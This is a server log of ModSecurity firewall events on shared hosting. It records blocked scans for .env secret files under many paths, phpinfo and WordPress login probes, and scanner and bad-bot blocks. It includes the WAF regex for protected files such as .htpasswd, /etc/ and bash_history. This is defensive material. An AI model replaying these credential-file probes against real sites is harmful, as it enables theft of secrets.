[Tue May 26 14:01:44.672251 2026] [security2:error] [pid 578581:tid 578691] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/API/.env"] [unique_id "ahVacJm_8al1sb-umPtmuQAALm0"]
[Tue May 26 14:01:44.689103 2026] [security2:error] [pid 578581:tid 578587] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/APP/.env"] [unique_id "ahVacJm_8al1sb-umPtmvwAALgU"]
[Tue May 26 14:01:44.691785 2026] [security2:error] [pid 578581:tid 578688] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/Api/.env"] [unique_id "ahVacJm_8al1sb-umPtmwAAALmo"]
[Tue May 26 14:01:44.704063 2026] [security2:error] [pid 578581:tid 578595] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/BACK/.env"] [unique_id "ahVacJm_8al1sb-umPtmwQAALg0"]
[Tue May 26 14:01:44.829901 2026] [security2:error] [pid 578581:tid 578586] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/BACKEND/.env"] [unique_id "ahVacJm_8al1sb-umPtmyAAALgQ"]
[Tue May 26 14:01:44.835995 2026] [security2:error] [pid 578581:tid 578596] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/BE/.env"] [unique_id "ahVacJm_8al1sb-umPtmyQAALg4"]
[Tue May 26 14:01:44.859476 2026] [security2:error] [pid 578581:tid 578694] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/Backend/.env"] [unique_id "ahVacJm_8al1sb-umPtmywAALnA"]
[Tue May 26 14:01:44.977180 2026] [security2:error] [pid 578581:tid 578593] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/Be/.env"] [unique_id "ahVacJm_8al1sb-umPtmzwAALgs"]
[Tue May 26 14:01:45.154497 2026] [security2:error] [pid 578581:tid 578786] [client 4.193.189.92:6552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/cache.php"] [unique_id "ahVacZm_8al1sb-umPtm1gAAAEs"]
[Tue May 26 14:01:45.353647 2026] [security2:error] [pid 578581:tid 578757] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacJm_8al1sb-umPtmsAAALgY"]
[Tue May 26 14:01:45.365776 2026] [security2:error] [pid 578581:tid 578757] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacJm_8al1sb-umPtmsQAALgc"]
[Tue May 26 14:01:45.397975 2026] [security2:error] [pid 578581:tid 578757] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacJm_8al1sb-umPtmvAAALmk"]
[Tue May 26 14:01:45.400510 2026] [security2:error] [pid 578581:tid 578757] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm0QAALnI"]
[Tue May 26 14:01:45.404218 2026] [security2:error] [pid 578581:tid 578757] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacJm_8al1sb-umPtmuwAALmI"]
[Tue May 26 14:01:45.406391 2026] [security2:error] [pid 578581:tid 578757] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacJm_8al1sb-umPtmuAAALmM"]
[Tue May 26 14:01:45.407713 2026] [security2:error] [pid 578581:tid 578757] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacJm_8al1sb-umPtmvgAALgw"]
[Tue May 26 14:01:45.422097 2026] [security2:error] [pid 578581:tid 578757] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacJm_8al1sb-umPtmugAALgE"]
[Tue May 26 14:01:45.426808 2026] [security2:error] [pid 578581:tid 578757] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacJm_8al1sb-umPtmygAALgo"]
[Tue May 26 14:01:45.427213 2026] [security2:error] [pid 578581:tid 578757] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacJm_8al1sb-umPtmvQAALgM"]
[Tue May 26 14:01:45.427405 2026] [security2:error] [pid 578581:tid 578757] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacJm_8al1sb-umPtm0AAALgg"]
[Tue May 26 14:01:45.428694 2026] [security2:error] [pid 578581:tid 578757] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm1QAALmQ"]
[Tue May 26 14:01:45.428831 2026] [security2:error] [pid 578581:tid 578757] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacJm_8al1sb-umPtmsgAALmA"]
[Tue May 26 14:01:45.441573 2026] [security2:error] [pid 578581:tid 578757] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacJm_8al1sb-umPtmtwAALgA"]
[Tue May 26 14:01:45.602958 2026] [security2:error] [pid 578581:tid 578602] [remote 199.247.4.24:49498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.4.247.199.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVacZm_8al1sb-umPtm2gAAABQ"]
[Tue May 26 14:01:45.776378 2026] [security2:error] [pid 578581:tid 578764] [client 202.141.30.10:35482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVacZm_8al1sb-umPtm-gAAADU"]
[Tue May 26 14:01:45.776519 2026] [security2:error] [pid 578581:tid 578764] [client 202.141.30.10:35482] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVacZm_8al1sb-umPtm-gAAADU"]
[Tue May 26 14:01:45.912986 2026] [security2:error] [pid 578581:tid 578820] [client 4.193.189.92:3122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/content.php"] [unique_id "ahVacZm_8al1sb-umPtnAgAAAG0"]
[Tue May 26 14:01:46.069032 2026] [security2:error] [pid 578581:tid 578728] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm7QAAABE"]
[Tue May 26 14:01:46.343897 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm3wAAPxI"]
[Tue May 26 14:01:46.352572 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm3gAAPxE"]
[Tue May 26 14:01:46.374912 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm4QAAP3k"]
[Tue May 26 14:01:46.380832 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm4AAAPxc"]
[Tue May 26 14:01:46.400059 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm9AAAP34"]
[Tue May 26 14:01:46.408454 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm5gAAP30"]
[Tue May 26 14:01:46.412492 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm5wAAP38"]
[Tue May 26 14:01:46.414376 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm4wAAPxw"]
[Tue May 26 14:01:46.418412 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm6gAAPxg"]
[Tue May 26 14:01:46.419464 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm8QAAP3E"]
[Tue May 26 14:01:46.422892 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm8gAAPxY"]
[Tue May 26 14:01:46.423213 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm5AAAPwk"]
[Tue May 26 14:01:46.426501 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm9gAAP3Y"]
[Tue May 26 14:01:46.435105 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm8wAAPxM"]
[Tue May 26 14:01:46.435324 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm6AAAP14"]
[Tue May 26 14:01:46.438938 2026] [security2:error] [pid 578581:tid 578774] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacZm_8al1sb-umPtm9QAAPyA"]
[Tue May 26 14:01:46.557233 2026] [security2:error] [pid 578581:tid 578611] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVacpm_8al1sb-umPtnIQAACx0"]
[Tue May 26 14:01:46.635508 2026] [security2:error] [pid 578581:tid 578613] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/admin-app/.env"] [unique_id "ahVacpm_8al1sb-umPtnKwAACx8"]
[Tue May 26 14:01:46.658237 2026] [security2:error] [pid 578581:tid 578827] [client 4.193.189.92:6503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/classwithtostring.php"] [unique_id "ahVacpm_8al1sb-umPtnLwAAAHQ"]
[Tue May 26 14:01:47.322093 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnFwAAC3M"]
[Tue May 26 14:01:47.332073 2026] [security2:error] [pid 578581:tid 578745] [client 85.208.96.210:39706] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVac5m_8al1sb-umPtnPgAAACI"]
[Tue May 26 14:01:47.332211 2026] [security2:error] [pid 578581:tid 578745] [client 85.208.96.210:39706] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVac5m_8al1sb-umPtnPgAAACI"]
[Tue May 26 14:01:47.334561 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnGAAAC3o"]
[Tue May 26 14:01:47.352609 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnHAAAC3c"]
[Tue May 26 14:01:47.356358 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnGgAAC3s"]
[Tue May 26 14:01:47.377029 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnHgAAC3g"]
[Tue May 26 14:01:47.389466 2026] [security2:error] [pid 578581:tid 578617] [remote 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnIAAACyM"]
[Tue May 26 14:01:47.397456 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnKAAACyI"]
[Tue May 26 14:01:47.403218 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnJwAACyQ"]
[Tue May 26 14:01:47.403538 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnJgAACzU"]
[Tue May 26 14:01:47.406106 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnKgAACx4"]
[Tue May 26 14:01:47.409088 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnIwAACyw"]
[Tue May 26 14:01:47.413297 2026] [security2:error] [pid 578581:tid 578820] [client 4.193.189.92:1351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/css.php"] [unique_id "ahVac5m_8al1sb-umPtnSAAAAG0"]
[Tue May 26 14:01:47.414803 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnIgAACyE"]
